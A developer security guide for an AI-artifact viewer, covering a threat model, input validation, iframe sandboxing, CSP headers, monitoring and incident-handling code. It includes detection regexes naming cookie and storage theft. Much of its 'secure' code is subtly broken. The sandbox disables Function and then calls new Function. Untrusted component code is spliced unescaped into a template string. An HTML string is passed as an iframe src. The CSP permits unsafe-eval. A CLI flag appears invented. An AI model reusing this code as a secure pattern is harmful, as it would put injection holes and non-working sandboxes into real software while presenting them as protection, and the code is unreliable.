Viewer Security Guide
Security Overview
The Bike4Mind viewer system handles potentially untrusted content from AI-generated artifacts, user uploads, and external sources. This guide covers the comprehensive security architecture designed to protect against XSS, code injection, and other security threats.
Threat Model
Potential Attack Vectors
-
Cross-Site Scripting (XSS)
- Malicious scripts in HTML artifacts
- JavaScript injection in React components
- CSS-based attacks in style attributes
-
Code Injection
- Arbitrary code execution in React sandbox
- Node.js module injection attempts
- Template injection in server-side rendering
-
Resource Exhaustion
- Infinite loops in React components
- Memory bombs in large data processing
- CPU-intensive operations blocking UI
-
Data Exfiltration
- Unauthorized API calls from sandboxed content
- Credential harvesting attempts
- Cross-origin data leakage
-
Content Spoofing
- UI redressing attacks
- Phishing via crafted content
- Misleading error messages
Security Architecture
Multi-Layer Defense Strategy
graph TB
subgraph "Input Layer"
I1[User Input]
I2[AI Generated Content]
I3[File Uploads]
end
subgraph "Validation Layer"
V1[Schema Validation]
V2[Content Sanitization]
V3[Size Limits]
V4[Type Checking]
end
subgraph "Sandbox Layer"
S1[Iframe Sandboxing]
S2[CSP Enforcement]
S3[Same-Origin Policy]
S4[Resource Restrictions]
end
subgraph "Runtime Layer"
R1[Error Boundaries]
R2[Resource Monitoring]
R3[Timeout Protection]
R4[Memory Limits]
end
subgraph "Output Layer"
O1[Safe Rendering]
O2[Escaped Content]
O3[Filtered Messages]
end
I1 --> V1
I2 --> V2
I3 --> V3
V1 --> S1
V2 --> S2
V3 --> S3
S1 --> R1
S2 --> R2
R1 --> O1
R2 --> O2
Content Validation
Input Sanitization
import DOMPurify from 'dompurify';
import { z } from 'zod';
// Comprehensive content validation schema
const SecureContentSchema = z.object({
content: z.string()
.min(1, 'Content cannot be empty')
.max(5000000, 'Content exceeds maximum size') // 5MB limit
.refine(
(content) => !content.includes('<script>'),
'Script tags are not allowed'
)
.refine(
(content) => !/<iframe(?!\s+sandbox=)/i.test(content),
'Unsandboxed iframes are not allowed'
),
type: z.enum(['html', 'react', 'svg', 'markdown']),
metadata: z.object({
dependencies: z.array(z.string()).optional(),
allowedTags: z.array(z.string()).optional(),
maxExecutionTime: z.number().max(30000).optional(), // 30 second limit
}).optional(),
});
export const validateSecureContent = (input: unknown): ValidationResult => {
try {
const validatedInput = SecureContentSchema.parse(input);
// Additional security checks
const securityIssues: string[] = [];
// Check for suspicious patterns
const suspiciousPatterns = [
/eval\s*\(/gi,
/Function\s*\(/gi,
/document\.cookie/gi,
/localStorage/gi,
/sessionStorage/gi,
/window\.location/gi,
/fetch\s*\(/gi,
/XMLHttpRequest/gi,
/import\s*\(/gi,
/require\s*\(/gi,
];
suspiciousPatterns.forEach(pattern => {
if (pattern.test(validatedInput.content)) {
securityIssues.push(`Potentially dangerous pattern detected: ${pattern.source}`);
}
});
// Sanitize HTML content
if (validatedInput.type === 'html') {
const sanitized = DOMPurify.sanitize(validatedInput.content, {
ALLOWED_TAGS: validatedInput.metadata?.allowedTags || ['div', 'span', 'p', 'h1', 'h2', 'h3'],
ALLOWED_ATTR: ['class', 'id', 'style'],
FORBID_SCRIPT: true,
FORBID_TAGS: ['script', 'object', 'embed', 'form', 'input'],
});
if (sanitized !== validatedInput.content) {
securityIssues.push('Content was modified during sanitization');
}
validatedInput.content = sanitized;
}
return {
isValid: securityIssues.length === 0,
errors: securityIssues,
sanitizedContent: validatedInput.content,
};
} catch (error) {
return {
isValid: false,
errors: [error instanceof Error ? error.message : 'Validation failed'],
sanitizedContent: '',
};
}
};
interface ValidationResult {
isValid: boolean;
errors: string[];
sanitizedContent: string;
}
React Component Validation
import * as ts from 'typescript';
import { transform } from '@babel/standalone';
export const validateReactComponent = (code: string): ReactValidationResult => {
const errors: string[] = [];
const warnings: string[] = [];
try {
// TypeScript compilation check
const compilerOptions: ts.CompilerOptions = {
target: ts.ScriptTarget.ES2020,
module: ts.ModuleKind.ESNext,
jsx: ts.JsxEmit.React,
strict: true,
noEmit: true,
};
const sourceFile = ts.createSourceFile(
'component.tsx',
code,
ts.ScriptTarget.ES2020,
true,
ts.ScriptKind.TSX
);
const program = ts.createProgram(['component.tsx'], compilerOptions, {
getSourceFile: (fileName) => fileName === 'component.tsx' ? sourceFile : undefined,
writeFile: () => {},
getCurrentDirectory: () => '',
getDirectories: () => [],
fileExists: () => true,
readFile: () => '',
getCanonicalFileName: (fileName) => fileName,
useCaseSensitiveFileNames: () => true,
getNewLine: () => '\n',
});
const diagnostics = ts.getPreEmitDiagnostics(program);
diagnostics.forEach(diagnostic => {
if (diagnostic.file && diagnostic.start !== undefined) {
const message = ts.flattenDiagnosticMessageText(diagnostic.messageText, '\n');
if (diagnostic.category === ts.DiagnosticCategory.Error) {
errors.push(message);
} else {
warnings.push(message);
}
}
});
// Security-specific checks
const securityChecks = [
{
pattern: /dangerouslySetInnerHTML/g,
message: 'dangerouslySetInnerHTML usage detected - potential XSS risk',
level: 'error' as const,
},
{
pattern: /eval\s*\(/g,
message: 'eval() usage detected - code injection risk',
level: 'error' as const,
},
{
pattern: /window\./g,
message: 'Direct window access detected',
level: 'warning' as const,
},
{
pattern: /document\./g,
message: 'Direct document access detected',
level: 'warning' as const,
},
];
securityChecks.forEach(check => {
const matches = code.match(check.pattern);
if (matches) {
const message = `${check.message} (${matches.length} occurrence${matches.length > 1 ? 's' : ''})`;
if (check.level === 'error') {
errors.push(message);
} else {
warnings.push(message);
}
}
});
// Check for required exports
if (!code.includes('export default') && !code.includes('export {')) {
errors.push('Component must have a default export');
}
// Babel transformation test
try {
transform(code, {
presets: ['react', 'typescript'],
filename: 'component.tsx',
});
} catch (babelError) {
errors.push(`Babel transformation failed: ${babelError.message}`);
}
return {
isValid: errors.length === 0,
errors,
warnings,
hasSecurityIssues: errors.some(e =>
e.includes('XSS') ||
e.includes('injection') ||
e.includes('dangerouslySetInnerHTML') ||
e.includes('eval')
),
};
} catch (error) {
return {
isValid: false,
errors: [error instanceof Error ? error.message : 'Unknown validation error'],
warnings: [],
hasSecurityIssues: true,
};
}
};
interface ReactValidationResult {
isValid: boolean;
errors: string[];
warnings: string[];
hasSecurityIssues: boolean;
}
Sandboxing Implementation
Secure Iframe Configuration
const generateSecureSandbox = (content: string, type: ArtifactType): string => {
// Strict Content Security Policy
const cspPolicy = [
"default-src 'none'",
"script-src 'unsafe-inline' 'unsafe-eval' https://unpkg.com",
"style-src 'unsafe-inline' https://cdn.tailwindcss.com",
"img-src 'self' data: blob:",
"font-src https://fonts.googleapis.com https://fonts.gstatic.com",
"connect-src 'none'", // No external connections
"form-action 'none'", // No form submissions
"frame-ancestors 'none'", // Prevent embedding
"base-uri 'none'", // Prevent base URL manipulation
].join('; ');
const sandboxHTML = `<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta http-equiv="Content-Security-Policy" content="${cspPolicy}">
<meta http-equiv="X-Frame-Options" content="DENY">
<meta http-equiv="X-Content-Type-Options" content="nosniff">
<title>Secure Sandbox</title>
<style>
* { box-sizing: border-box; }
body {
margin: 0;
padding: 16px;
font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', sans-serif;
background: white;
overflow-wrap: break-word;
}
.error {
color: #d32f2f;
background: #ffebee;
padding: 16px;
border-radius: 4px;
border-left: 4px solid #d32f2f;
font-family: monospace;
white-space: pre-wrap;
margin: 16px 0;
}
.sandbox-info {
position: fixed;
top: 8px;
right: 8px;
background: rgba(0,0,0,0.1);
padding: 4px 8px;
border-radius: 4px;
font-size: 12px;
opacity: 0.7;
pointer-events: none;
}
</style>
</head>
<body>
<div class="sandbox-info">Sandboxed Content</div>
<div id="root"></div>
<div id="error-container"></div>
<script>
// Disable potentially dangerous global functions
window.eval = undefined;
window.Function = undefined;
// Error handling and reporting
const errorContainer = document.getElementById('error-container');
const reportError = (message, source = 'sandbox') => {
console.error('Sandbox Error:', message);
// Report to parent frame
try {
parent.postMessage({
type: 'sandbox_error',
message: message,
source: source,
timestamp: Date.now(),
}, '*');
} catch (e) {
console.error('Failed to report error to parent:', e);
}
// Show error in sandbox
const errorDiv = document.createElement('div');
errorDiv.className = 'error';
errorDiv.textContent = \`\${source.toUpperCase()} ERROR: \${message}\`;
errorContainer.appendChild(errorDiv);
};
// Global error handlers
window.addEventListener('error', (event) => {
reportError(event.error?.message || event.message, 'runtime');
});
window.addEventListener('unhandledrejection', (event) => {
reportError(event.reason?.message || String(event.reason), 'promise');
});
// Execution timeout protection
const executionTimeout = setTimeout(() => {
reportError('Execution timeout - component took too long to render', 'timeout');
}, 10000); // 10 second timeout
try {
${generateSandboxContent(content, type)}
// Clear timeout on successful execution
clearTimeout(executionTimeout);
// Report successful load
parent.postMessage({
type: 'sandbox_ready',
timestamp: Date.now(),
}, '*');
} catch (error) {
clearTimeout(executionTimeout);
reportError(error.message || 'Unknown execution error', 'execution');
}
</script>
</body>
</html>`;
return sandboxHTML;
};
const generateSandboxContent = (content: string, type: ArtifactType): string => {
switch (type) {
case 'react':
return generateReactSandboxContent(content);
case 'html':
return generateHTMLSandboxContent(content);
case 'svg':
return generateSVGSandboxContent(content);
default:
throw new Error(`Unsupported sandbox type: ${type}`);
}
};
React Sandbox Implementation
const generateReactSandboxContent = (componentCode: string): string => {
return `
// React sandbox environment
const { createElement, useState, useEffect, useRef, useMemo, useCallback } = React;
// Restricted require function
const require = (module) => {
const allowedModules = {
'react': React,
'lucide-react': typeof LucideReact !== 'undefined' ? LucideReact : {},
'recharts': typeof Recharts !== 'undefined' ? Recharts : {},
// Add other allowed modules
};
if (!allowedModules.hasOwnProperty(module)) {
throw new Error(\`Module "\${module}" is not allowed in sandbox\`);
}
return allowedModules[module];
};
// Component execution with error boundaries
try {
// Transform and execute component code
const transformedCode = \`${componentCode
.replace(/import\s+.*?from\s+['"]react['"];?/g, '// React imported globally')
.replace(/import\s+(.+?)\s+from\s+['"](.+?)['"];?/g, 'const $1 = require("$2");')
.replace(/export\s+default\s+/g, 'const __COMPONENT__ = ')}\`;
// Babel transformation
const babelResult = Babel.transform(transformedCode, {
presets: ['react'],
plugins: [
// Custom plugin to restrict dangerous operations
function restrictDangerousOperations() {
return {
visitor: {
CallExpression(path) {
const callee = path.node.callee;
if (callee.type === 'Identifier' &&
['eval', 'Function', 'setTimeout', 'setInterval'].includes(callee.name)) {
throw new Error(\`\${callee.name} is not allowed in sandbox\`);
}
},
MemberExpression(path) {
const object = path.node.object;
const property = path.node.property;
if (object.type === 'Identifier' && object.name === 'window' &&
property.type === 'Identifier' &&
['localStorage', 'sessionStorage', 'location'].includes(property.name)) {
throw new Error(\`window.\${property.name} is not allowed in sandbox\`);
}
}
}
};
}
]
});
// Execute in controlled environment
const executionScope = {
React,
useState,
useEffect,
useRef,
useMemo,
useCallback,
require,
console,
};
const executeInScope = new Function(
...Object.keys(executionScope),
babelResult.code + '; return typeof __COMPONENT__ !== "undefined" ? __COMPONENT__ : null;'
);
const Component = executeInScope(...Object.values(executionScope));
if (!Component) {
throw new Error('No valid React component found');
}
// Render component with error boundary
const root = ReactDOM.createRoot(document.getElementById('root'));
const ErrorBoundary = ({ children }) => {
const [hasError, setHasError] = React.useState(false);
const [error, setError] = React.useState(null);
React.useEffect(() => {
const handleError = (event) => {
setHasError(true);
setError(event.error || event.reason);
};
window.addEventListener('error', handleError);
window.addEventListener('unhandledrejection', handleError);
return () => {
window.removeEventListener('error', handleError);
window.removeEventListener('unhandledrejection', handleError);
};
}, []);
if (hasError) {
return React.createElement('div', {
className: 'error'
}, 'Component Error: ' + (error?.message || 'Unknown error'));
}
return children;
};
root.render(
React.createElement(ErrorBoundary, null,
React.createElement(Component)
)
);
} catch (error) {
throw new Error('Component execution failed: ' + error.message);
}
`;
};
Security Monitoring
Runtime Security Monitoring
class SecurityMonitor {
private static instance: SecurityMonitor;
private violations: SecurityViolation[] = [];
private listeners: SecurityListener[] = [];
static getInstance(): SecurityMonitor {
if (!SecurityMonitor.instance) {
SecurityMonitor.instance = new SecurityMonitor();
}
return SecurityMonitor.instance;
}
recordViolation(violation: SecurityViolation): void {
this.violations.push({
...violation,
timestamp: Date.now(),
sessionId: this.getCurrentSessionId(),
});
// Alert listeners
this.listeners.forEach(listener => {
try {
listener(violation);
} catch (error) {
console.error('Security listener error:', error);
}
});
// Log critical violations
if (violation.severity === 'critical') {
console.error('CRITICAL SECURITY VIOLATION:', violation);
// Could send to monitoring service
this.reportCriticalViolation(violation);
}
}
addListener(listener: SecurityListener): () => void {
this.listeners.push(listener);
return () => {
const index = this.listeners.indexOf(listener);
if (index > -1) {
this.listeners.splice(index, 1);
}
};
}
getViolationReport(): SecurityReport {
const now = Date.now();
const last24Hours = this.violations.filter(v =>
now - v.timestamp < 24 * 60 * 60 * 1000
);
return {
totalViolations: this.violations.length,
last24Hours: last24Hours.length,
criticalViolations: this.violations.filter(v => v.severity === 'critical').length,
commonViolations: this.getMostCommonViolations(),
timeRange: {
start: this.violations[0]?.timestamp || now,
end: now,
},
};
}
private getCurrentSessionId(): string {
// Implementation to get current session ID
return 'session-' + Date.now();
}
private async reportCriticalViolation(violation: SecurityViolation): Promise<void> {
try {
// Report to monitoring service
await fetch('/api/security/violations', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify(violation),
});
} catch (error) {
console.error('Failed to report security violation:', error);
}
}
private getMostCommonViolations(): Array<{ type: string; count: number }> {
const counts = this.violations.reduce((acc, violation) => {
acc[violation.type] = (acc[violation.type] || 0) + 1;
return acc;
}, {} as Record<string, number>);
return Object.entries(counts)
.sort(([, a], [, b]) => b - a)
.slice(0, 10)
.map(([type, count]) => ({ type, count }));
}
}
interface SecurityViolation {
type: 'xss_attempt' | 'code_injection' | 'resource_abuse' | 'csp_violation' | 'sandbox_escape';
severity: 'low' | 'medium' | 'high' | 'critical';
message: string;
source: string;
artifactId?: string;
userAgent?: string;
timestamp?: number;
sessionId?: string;
}
type SecurityListener = (violation: SecurityViolation) => void;
interface SecurityReport {
totalViolations: number;
last24Hours: number;
criticalViolations: number;
commonViolations: Array<{ type: string; count: number }>;
timeRange: { start: number; end: number };
}
Usage in Viewers
const SecureReactViewer: React.FC<ArtifactViewerProps<ReactArtifact>> = ({
artifact,
onError
}) => {
const securityMonitor = SecurityMonitor.getInstance();
useEffect(() => {
// Set up security monitoring
const removeListener = securityMonitor.addListener((violation) => {
if (violation.artifactId === artifact.id) {
onError?.(`Security violation: ${violation.message}`);
}
});
return removeListener;
}, [artifact.id, onError, securityMonitor]);
// Message handler for sandbox communications
useEffect(() => {
const handleMessage = (event: MessageEvent) => {
if (event.data.type === 'sandbox_error') {
securityMonitor.recordViolation({
type: 'sandbox_escape',
severity: 'high',
message: event.data.message,
source: 'react_sandbox',
artifactId: artifact.id,
});
}
};
window.addEventListener('message', handleMessage);
return () => window.removeEventListener('message', handleMessage);
}, [artifact.id, securityMonitor]);
return (
<SecurityBoundary artifactId={artifact.id}>
<ReactArtifactViewer artifact={artifact} onError={onError} />
</SecurityBoundary>
);
};
const SecurityBoundary: React.FC<{
children: React.ReactNode;
artifactId: string;
}> = ({ children, artifactId }) => {
const securityMonitor = SecurityMonitor.getInstance();
useEffect(() => {
// Monitor for performance anomalies that might indicate attacks
const startTime = performance.now();
return () => {
const endTime = performance.now();
const executionTime = endTime - startTime;
if (executionTime > 30000) { // 30 seconds
securityMonitor.recordViolation({
type: 'resource_abuse',
severity: 'medium',
message: `Excessive execution time: ${executionTime}ms`,
source: 'security_boundary',
artifactId,
});
}
};
}, [artifactId, securityMonitor]);
return <>{children}</>;
};
Security Best Practices
Development Guidelines
-
Always Validate Input
// ❌ Never trust user input
const dangerousRender = (content: string) => (
<div dangerouslySetInnerHTML={{ __html: content }} />
);
// ✅ Always validate and sanitize
const safeRender = (content: string) => {
const validation = validateSecureContent({ content, type: 'html' });
if (!validation.isValid) {
return <ErrorDisplay errors={validation.errors} />;
}
return <div dangerouslySetInnerHTML={{ __html: validation.sanitizedContent }} />;
}; -
Use Sandboxes for Untrusted Content
// ✅ Always sandbox untrusted code execution
const SecureCodeViewer = ({ code }: { code: string }) => (
<iframe
sandbox="allow-scripts"
src={generateSecureSandbox(code)}
style={{ border: 'none', width: '100%', height: '100%' }}
/>
); -
Implement Proper Error Boundaries
// ✅ Catch and contain errors securely
class SecurityErrorBoundary extends React.Component {
componentDidCatch(error: Error, errorInfo: React.ErrorInfo) {
// Don't expose sensitive error details
const safeError = this.sanitizeError(error);
this.reportSecurityError(safeError);
}
private sanitizeError(error: Error): SafeError {
return {
message: 'A security error occurred',
type: 'security_boundary_error',
timestamp: Date.now(),
};
}
} -
Monitor Resource Usage
const useResourceMonitoring = (artifactId: string) => {
useEffect(() => {
const monitor = new PerformanceObserver((list) => {
const entries = list.getEntries();
entries.forEach(entry => {
if (entry.duration > 5000) { // 5 second threshold
SecurityMonitor.getInstance().recordViolation({
type: 'resource_abuse',
severity: 'medium',
message: `Long task detected: ${entry.duration}ms`,
source: 'performance_monitor',
artifactId,
});
}
});
});
monitor.observe({ entryTypes: ['longtask'] });
return () => monitor.disconnect();
}, [artifactId]);
};
Deployment Security
-
Content Security Policy Headers
// Add to your Next.js configuration
const securityHeaders = [
{
key: 'Content-Security-Policy',
value: [
"default-src 'self'",
"script-src 'self' 'unsafe-inline' 'unsafe-eval' https://unpkg.com",
"style-src 'self' 'unsafe-inline' https://fonts.googleapis.com",
"img-src 'self' data: blob: https:",
"font-src 'self' https://fonts.gstatic.com",
"connect-src 'self'",
"frame-src 'self' blob:",
].join('; '),
},
{
key: 'X-Frame-Options',
value: 'DENY',
},
{
key: 'X-Content-Type-Options',
value: 'nosniff',
},
]; -
Regular Security Audits
# Run security audits regularly
npm audit --audit-level high
pnpm audit --audit-level high
# Check for known vulnerabilities
npx snyk test
# Analyze bundle for security issues
npx webpack-bundle-analyzer --security -
Dependency Management
{
"overrides": {
"vulnerable-package": "safe-version"
},
"resolutions": {
"another-vulnerable-package": "safe-version"
}
}
Incident Response
Security Incident Handling
class SecurityIncidentHandler {
async handleIncident(incident: SecurityIncident): Promise<void> {
// 1. Immediate containment
await this.containThreat(incident);
// 2. Assessment
const impact = await this.assessImpact(incident);
// 3. Notification
await this.notifyStakeholders(incident, impact);
// 4. Remediation
await this.remediateThreat(incident);
// 5. Documentation
await this.documentIncident(incident, impact);
}
private async containThreat(incident: SecurityIncident): Promise<void> {
switch (incident.type) {
case 'xss_attempt':
// Disable affected viewer
// Clear potentially malicious content
break;
case 'code_injection':
// Terminate sandbox execution
// Block further attempts from source
break;
case 'resource_abuse':
// Throttle or block resource-intensive operations
break;
}
}
}
interface SecurityIncident {
id: string;
type: SecurityViolation['type'];
severity: SecurityViolation['severity'];
timestamp: number;
affectedComponents: string[];
details: Record<string, unknown>;
}
This security guide provides comprehensive protection for the viewer system while maintaining functionality and user experience. Regular reviews and updates of these security measures are essential to address evolving threats.